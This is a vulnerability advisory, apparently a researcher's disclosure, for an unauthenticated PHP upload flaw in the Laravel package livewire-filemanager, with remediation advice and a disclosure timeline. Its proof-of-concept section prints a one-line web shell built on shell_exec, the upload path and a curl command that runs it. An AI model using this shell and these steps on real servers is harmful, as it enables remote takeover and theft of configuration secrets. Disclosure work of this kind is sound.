Unauthenticated RCE in Livewire Filemanager (CVE-2025-14894)

Date: January 16, 2026

Author: HackingByDoing

CVE: CVE-2025-14894

Vendor: livewire-filemanager (Bee Interactive / Laravel)

CVSS Score: 9.8 (Critical)

Executive Summary

I recently discovered a critical vulnerability in the livewire-filemanager package, a file management tool designed for Laravel applications. The vulnerability allows an unauthenticated attacker to upload arbitrary files, including PHP scripts to the server.

Because these files are stored in a public directory by default, an attacker can execute the uploaded scripts via the web browser, achieving Remote Code Execution (RCE) on the host system.

Technical Analysis

Root Cause: Missing File Type Validation

The core issue lies within the LivewireFilemanagerComponent.php component. The application handles file uploads without performing sufficient validation on the file type, MIME type, or file extension.

When a file is uploaded via the UI, the backend processes it using a logic flow similar to this:

$this->currentFolder
    ->addMedia($file->getRealPath())
    ->usingName($file->getClientOriginalName());

As seen above, there are no mimes: rules or filename whitelisting applied before storage.

The Execution Vector: storage:link

By default, the package stores uploaded files in the storage/app/public directory. In the Laravel ecosystem, it is standard practice (and often a requirement for serving media) to run the following command:

php artisan storage:link

This command creates a symbolic link from public/storage to storage/app/public, making the uploaded files directly accessible via the web server.

Because the file manager does not rename files to safe hashes or restrict dangerous extensions (like .php), an attacker can simply browse to the URL of their uploaded shell to execute it.

Proof of Concept (PoC)

An attacker can exploit this vulnerability without any credentials by following these steps:

1. Create a Malicious Payload

Create a simple PHP web shell named shell.php.

<?php echo "RCE:".shell_exec($_GET['cmd']); ?>

2. Upload via the Interface

Using the livewire-filemanager UI, upload shell.php. The system accepts the file without error.

3. Locate the File

The file is typically stored in a predictable path, such as:

storage/app/public/{folder_id}/shell.php 

4. Execute Remote Code

Access the file via the public URL to trigger the execution.

curl "http://127.0.0.1:8000/storage/{folder_id}/shell.php?cmd=id"

Response:

RCE: uid=33(www-data) gid=33(www-data) groups=33(www-data)

Impact

• Attack Vector: Network

• Privileges Required: None

• Confidentiality, Integrity, Availability: High

This is a full RCE vulnerability. An attacker can gain control of the web server user (www-data), read sensitive configuration files (like .env), modify data, or pivot to other internal systems.

Remediation & Mitigation

Users of livewire-filemanager are strongly advised to take one of the following actions immediately:

1. Remove the Package: If possible, uninstall the package until a security patch is released.

2. Disable Public Access: Remove the symbolic link created by php artisan storage:link if it is not strictly required for other parts of your application.

3. Manual Patching: You can manually enforce validation in the component by adding strict rules for allowed MIME types (e.g., images only) and ensuring files are saved with randomized hashes rather than their original filenames.

// Example Validation Fix
$this->validate([
    'files.*' => 'file|mimes:jpg,jpeg,png,pdf|max:20480'
]);

Disclosure Timeline

• 2025-10-08: Vulnerability reported to CERT/CC.

• 2025-10-14: Initial attempt to contact vendor.

• 2025-11-03: Follow-up attempts (No response).

• 2026-01-16: Public disclosure via CERT/VINCE and this advisory.